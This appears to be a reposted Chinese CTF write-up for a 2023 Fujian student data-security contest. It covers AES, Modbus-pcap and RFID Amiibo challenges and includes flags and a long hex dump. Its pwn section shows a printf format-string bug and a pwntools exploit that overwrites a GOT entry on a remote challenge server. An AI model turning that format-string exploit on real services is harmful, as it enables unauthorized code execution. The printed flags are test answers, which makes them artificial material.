-
Misc
-
RFID
-
签到
-
Modbus
-
Reverse
-
Stm32
-
Pwn
-
调皮的复读姬
需要复现题目的师傅可以到这里看看
https://github.com/CTF-Archives/2023-fjsdxssjan
Misc · 签到
AES解密,根据给的密码和数据直接解即可
flag{9330c030-a785-480f-9bb4-9fabe2326413}
Misc · Modbus
非常经典的Modbus协议
写个脚本提取一下
import pyshark
captures = pyshark.FileCapture("flag.pcapng", tshark_path="F:\Wireshark\tshark.exe")
func_codes = {}
idx = 1
flag = False
for c in captures:
for pkt in c:
if pkt.layer_name == "modbus":
func_code = int(pkt.func_code)
if func_code == 16:
if flag == True:
flag = False
continue
payload = str(c["TCP"].payload).split(":")[-1]
payload = '0x' + payload
print(chr(int(payload,16)),end="")
flag = True
idx += 1
运行得到
十六进制解码即可
flag{14240159-7f36-4c36-b46a-74a6a6ded84a}
也可以直接跟踪TCP出flag,效果都一样
MISC · RFID
题目给了key_retail.bin,可以猜测这是RFID的Amiibo的key文件,结合sniff_log.log,可以得知要我们还原卡log上的数据,把log定位一下卡起始位置,直接对a2 xx进行一个十六进制的排序,写个脚本整理一下数据集得到
04ebc2a5
42484b80
c1480fe0
f110ffee
a5000000
a5795220
f8f12a5e
a0a913f4
0d6d80b8
b63471f0
0cf81923
1cac3639
506a3198
7a3d0ea8
88e5ef63
0643dc05
b853d249
28581a92
5749a5d7
2f08fe10
c7dfc0c5
08020000
025e0402
0d125603
df2fd4d8
b6edcb3e
55d752cc
c0eebd7c
bc3ecb1c
039d19a0
92d670f4
121c743f
132f0b90
e1a90218
544f6cfe
646a13c9
5609511b
d405acca
3354ce1c
d37d20c5
f1429fc7
7b233213
af88275d
54481e9d
578e3764
4cc608ab
caf8a3db
d2067f79
7b40f54a
641dd981
ae942edd
fb10b5d8
2658a4f4
fee5a095
b77be490
afa7c57a
f3e0c9d5
0ab442e3
f5c36d98
c9fc4d42
4cf11147
d44592cf
4349b7e4
f5f7c724
bfaa8796
b0ef16e7
d058189d
9b808c7f
1b5a0745
4c2eb806
3036842d
d0fafbb6
392d8555
29c6a621
1232b34c
2583b3c8
8258d13b
56cf5eff
b4d64f87
183278a8
03218ca8
e6039921
f6c58a68
c061b88d
9ca14e08
0fe647e1
1b624e0b
271a1107
13a24cb8
d2864754
2fbdb259
b18178fc
606bc359
f3af1f4e
982ffac3
c824437f
4cfbbbec
aab965fa
ab6f0544
43b1a5c2
9fc9c3d6
6522780d
90406835
c5f47f43
935d9093
815c9600
f638fff7
3faea32a
53a77ca7
dcfa8f3d
6836a75c
18d3c548
ebe129b5
6ccb5e9a
57e15f3e
1d328249
7f6c1f59
27f367d5
b2e9ae97
57bf8b19
da6c09f4
5d4f9789
d01ee44c
04902e28
6c2bf289
ef2c0c2d
b162abc9
ab40f993
03361a1f
e7145b2a
01000fbd
00000004
5f000000
00000000
00000000
然后直接010梭哈还原成bin,根据题目给定的Key对数据进行一个还原
然后得到上面这个效果,因为作者使用的是3ds的人物模型,所以我们只需要网上找一个模型编辑软件查看一下就好了
查看十六进制得到flag
flag{d866a089-f26a-412e-b548-09ed645d7b89}
Reference:
https://recon.cx/2018/montreal/schedule/system/event_attachments/attachments/000/000/046/original/RECON-MTL-2018-Hacking_Amiibo_with_SDR.pdf
https://recon.cx/2018/montreal/schedule/events/132.html
REVERSE · Stm32
PWN · 调皮的复读姬
查看保护
在choose 后发现利用点
puts("You find a Repeater!");
read(0,buf,0xC8);
printf(buf); from pwn import *
from LibcSearcher import *
context(
terminal=["wt.exe", "wsl"],
os = "linux",
arch ='amd64',
#arch = "i386",
log_level='debug'
)
elf = ELF('./pwn')
#io = process('./pwn')
#libc = ELF("")
io = remote("39.106.48.123",36951)
def debug():
gdb.attach(io)
pause()
#code here
#debug()
scanf_got = elf.got['__isoc99_scanf']
Xiao_Si_addr = elf.sym['Xiao_Si']
payload = fmtstr_payload(6,{scanf_got:Xiao_Si_addr})
io.sendlineafter(b'choose:',str(4294967293).encode())
io.sendafter(b'You find a Repeater!n',payload)
io.interactive()
Web
原文始发于微信公众号(Gh0xE9):2023年福建省大学生数据安全大赛初赛部分Writeup
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论